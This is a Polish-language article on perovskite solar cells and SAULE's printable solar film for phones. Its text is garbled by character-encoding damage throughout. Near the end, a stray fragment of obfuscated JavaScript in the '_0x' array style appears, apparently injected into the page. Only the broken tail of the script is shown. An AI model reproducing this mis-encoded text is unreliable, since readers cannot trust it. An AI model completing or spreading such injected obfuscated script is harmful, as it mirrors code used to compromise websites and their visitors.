SposA?b na taA�szA� energiA� solarnA� ukryty wa�� skaA�ach.

0
60
Jack C. Haskell via Foter.com / CC BY-NC-ND

O perowskitach i ich moA?liwym wpA�ywie na produkcjA� ogniw sA�onecznych byA�o juA? gA�oA�no. Ale czym one sA�, skA�d siA� biorA�, jak jeszcze moA?na je wykorzystaA�? A�

MineraA�y o charakterystycznej strukturze uA�oA?enia atomA?w, o wiele skuteczniej pochA�aniajA�A� A�wiatA�o, dziA�ki czemu najprawdopodobniej zastA�piA� wkrA?tce w produkcji ogniw sA�onecznych krzem. Perowskity, nie sA� jednak nowym odkryciem, znane sA� juA? od ponad 100 lat! SkA�d, wiA�c nagA�e zainteresowanie nimi? Wszystko za sprawA� polskiej firmy SAULE, ktA?rej zaA�oA?ycielka a�� Olga Malinkiewicz, przedstawiA�a pomysA� na tanie i proste wykorzystanie ich w przemyA�le, a takA?e w A?yciu codziennym.

DziA�ki obecnoA�ci mineraA�A?w w przyrodzie, m. in. w skaA�ach i magmie oraz moA?liwoA�ci ich stworzenia w warunkach laboratoryjnych, dostA�p do nich jest niemal nieograniczony. Do tego, czA�A�A� z perowskitA?w jest moA?liwa do rozpuszczenia a�� i na tej wA�aA�ciwoA�ci skupiajA� siA� polscy naukowcy,A�gdyA?A�dziA�ki niej sporzA�dziA� moA?na z nich tusze do drukarek przemysA�owych, co zdecydowanie obniA?y koszty produkcji paneli sA�onecznych. Zamiast produkowaA� je, wystarczy, A?e zostanA� wydrukowane i umieszczone na wybranej powierzchni.

SA�yszA�c o panelach i energii sA�onecznej pierwszym skojarzeniem sA� wielkie instalacje, przede wszystkim na dachach budynkA?w. DziA�ki pierwszemu praktycznemu produktowi zaprezentowanemu przez polskA� firmA�, trzeba bA�dzie zmieniA� swoje skojarzenia, bo taki panel bA�dzie moA?na trzymaA� w kieszeni. MA�oda badaczka zaprezentowaA�a nowA� A�adowarkA�, a dokA�adnie rozwiA�zanie, ktA?re sprawi, A?e A�adowarka nie bA�dzie nam juA? w ogA?le potrzebna. Niezwykle cienka folia pokryta perowskitami, umieszczona na a�znieuA?ywaneja�? stronie telefonu, umoA?liwi nam napeA�nianie baterii za pomocA� biurowej lampki. Nie bA�dziemy teA? musieli czekaA� na sA�oneczne dni, A?eby korzystaA� z tego udogodnienia.

Piotr Krych prezes zarzA�du SAULEA�zapewnia, A?e jest to pierwszy etap, a na kaA?dym kolejnym bA�dA� trwaA�y prace nad coraz wiA�kszymi i wydajniejszymi powierzchniami nadruku. Zastosowaniem tych rozwiA�zaA� interesujA� siA� przedsiA�biorstwa z rA?A?nychA�branA? i sektorA?w gospodarkiA�z caA�ego A�wiata.

Telefon byA� pierwszy, lecz firma chce, aby materiaA� mA?gA� byA� umieszczany na niemal kaA?dej powierzchni, tym samym umoA?liwiajA�c jej uA?ytkownikom czerpanie energii. a�� MoA?liwoA�ci jest naprawdA� duA?o. Od elektroniki uA?ytkowej, poprzez budownictwo, po przemysA� zbrojeniowy. Trudno mA?wiA� tu o jednym produkcie a�� mA?wi Olga Malinkiewicz w wywiadzie dla Ekologia.pl.

A�

A�

A�

A� or[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

BRAK KOMENTARZY

ZOSTAW ODPOWIEDŹ